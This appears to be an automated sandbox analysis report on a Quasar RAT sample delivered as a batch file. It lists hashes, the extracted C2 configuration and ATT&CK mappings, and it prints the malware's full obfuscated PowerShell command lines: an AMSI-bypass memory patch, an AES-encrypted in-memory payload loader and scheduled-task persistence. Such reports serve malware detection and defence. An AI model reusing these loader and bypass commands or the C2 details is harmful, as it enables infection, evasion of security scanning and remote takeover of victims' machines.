Analysis

  • max time kernel
    33s
  • max time network
    23s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-05-2024 23:36

General

  • Target

    Uni.bat

  • Size

    515KB

  • MD5

    4c2a3be3d5c9464eb441677e41f44fd8

  • SHA1

    c826034a0882d21a39056d745e88622ee9698343

  • SHA256

    45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

  • SHA512

    ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

  • SSDEEP

    12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

review-tops.gl.at.ply.gg:48212

Mutex

$Sxr-IGnkORFTlshRl7BdTw

Attributes
  • encryption_key

    YDmRBA8wExjQkYgGrHhN

  • install_name

    $sxr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Discord

  • subdirectory

    $77

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:428
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0ba9ebc7-bbe7-4c86-bbd5-d94e6c1d1256}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1172
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:688
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:980
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:536
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:452
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1060
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1152
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:serRBHKKBDGS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NUZQsMLMPBpUyB,[Parameter(Position=1)][Type]$BLJBSSemmB)$AIywZgAGnHK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Delega'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+[Char](44)+'P'+'u'+''+'b'+'l'+'i'+'c'+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+'A'+'u'+[Char](116)+'o'+'C'+'l'+'a'+'ss',[MulticastDelegate]);$AIywZgAGnHK.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NUZQsMLMPBpUyB).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+'a'+[Char](110)+'a'+'g'+''+'e'+''+'d'+'');$AIywZgAGnHK.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke','P'+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+'B'+[Char](121)+'Si'+[Char](103)+','+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+''+[Char](114)+'tu'+[Char](97)+'l',$BLJBSSemmB,$NUZQsMLMPBpUyB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e,'+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $AIywZgAGnHK.CreateType();}$mGfvhHBBeXvaI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'em'+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+'o'+'s'+''+'o'+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+'a'+'t'+[Char](105)+'v'+'e'+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+'s'+'');$gSyKWgjeRyzpeP=$mGfvhHBBeXvaI.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+''+'o'+''+'c'+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',St'+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RsmJWItBUAXpAsVcDrq=serRBHKKBDGS @([String])([IntPtr]);$ItKjOjUXDKaRxfnulRrsnT=serRBHKKBDGS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JtcDdSilxOx=$mGfvhHBBeXvaI.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+'o'+'d'+'u'+'l'+''+'e'+'H'+[Char](97)+'n'+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$DGDGcQwEvxvcCE=$gSyKWgjeRyzpeP.Invoke($Null,@([Object]$JtcDdSilxOx,[Object]('L'+[Char](111)+''+'a'+'d'+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$XrVBEnfIYMvmDAbEj=$gSyKWgjeRyzpeP.Invoke($Null,@([Object]$JtcDdSilxOx,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+'o'+[Char](116)+''+'e'+''+'c'+'t')));$UvzSVDQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DGDGcQwEvxvcCE,$RsmJWItBUAXpAsVcDrq).Invoke(''+[Char](97)+'ms'+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$kYKHwPNHgcPkfkmlP=$gSyKWgjeRyzpeP.Invoke($Null,@([Object]$UvzSVDQ,[Object]('A'+[Char](109)+'si'+[Char](83)+'c'+'a'+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$gzjlmXVIyg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XrVBEnfIYMvmDAbEj,$ItKjOjUXDKaRxfnulRrsnT).Invoke($kYKHwPNHgcPkfkmlP,[uint32]8,4,[ref]$gzjlmXVIyg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kYKHwPNHgcPkfkmlP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XrVBEnfIYMvmDAbEj,$ItKjOjUXDKaRxfnulRrsnT).Invoke($kYKHwPNHgcPkfkmlP,[uint32]8,0x20,[ref]$gzjlmXVIyg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:1904
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1164
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1212
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1228
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1276
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1400
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2836
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Drops file in System32 directory
                                PID:1408
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1424
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1540
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1560
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1688
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1740
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1756
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1852
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1880
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:2036
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1052
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1980
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2056
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2192
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2256
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2368
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2476
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2484
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                    PID:2516
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2592
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2616
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2660
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2704
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2748
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2852
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3088
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3260
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:568
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net file
                                                                                        3⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:412
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 file
                                                                                          4⤵
                                                                                            PID:4032
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2812
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_212_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_212.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4948
                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_212.vbs"
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4716
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_212.bat" "
                                                                                              5⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1220
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net file
                                                                                                6⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2412
                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                  C:\Windows\system32\net1 file
                                                                                                  7⤵
                                                                                                    PID:1520
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_212.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_212.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                  6⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:5020
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
                                                                                                    7⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:3064
                                                                                                  • C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:1004
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                        PID:1356
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3812
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                          1⤵
                                                                                            PID:3408
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                            1⤵
                                                                                              PID:3460
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3832
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3896
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:3964
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                    1⤵
                                                                                                      PID:4020
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                      1⤵
                                                                                                        PID:4396
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                        1⤵
                                                                                                          PID:4420
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3172
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:4972
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                              1⤵
                                                                                                                PID:1240
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                1⤵
                                                                                                                  PID:2496
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                  1⤵
                                                                                                                    PID:3932
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                    1⤵
                                                                                                                      PID:3004
                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                      1⤵
                                                                                                                        PID:4592
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:4560
                                                                                                                        • C:\Windows\sysWOW64\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:1184
                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:3372

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                            Execution

                                                                                                                            Command and Scripting Interpreter

                                                                                                                            1
                                                                                                                            T1059

                                                                                                                            PowerShell

                                                                                                                            1
                                                                                                                            T1059.001

                                                                                                                            Scheduled Task/Job

                                                                                                                            1
                                                                                                                            T1053

                                                                                                                            Persistence

                                                                                                                            Scheduled Task/Job

                                                                                                                            1
                                                                                                                            T1053

                                                                                                                            Privilege Escalation

                                                                                                                            Scheduled Task/Job

                                                                                                                            1
                                                                                                                            T1053

                                                                                                                            Defense Evasion

                                                                                                                            Subvert Trust Controls

                                                                                                                            1
                                                                                                                            T1553

                                                                                                                            Install Root Certificate

                                                                                                                            1
                                                                                                                            T1553.004

                                                                                                                            Modify Registry

                                                                                                                            1
                                                                                                                            T1112

                                                                                                                            Discovery

                                                                                                                            System Information Discovery

                                                                                                                            1
                                                                                                                            T1082

                                                                                                                            Command and Control

                                                                                                                            Web Service

                                                                                                                            1
                                                                                                                            T1102

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              5dc9a9599fb11ee70f9164d8fea15abf

                                                                                                                              SHA1

                                                                                                                              85faf41a206f3fa8b469609333558cf817df2cda

                                                                                                                              SHA256

                                                                                                                              3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de

                                                                                                                              SHA512

                                                                                                                              499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                              Filesize

                                                                                                                              17KB

                                                                                                                              MD5

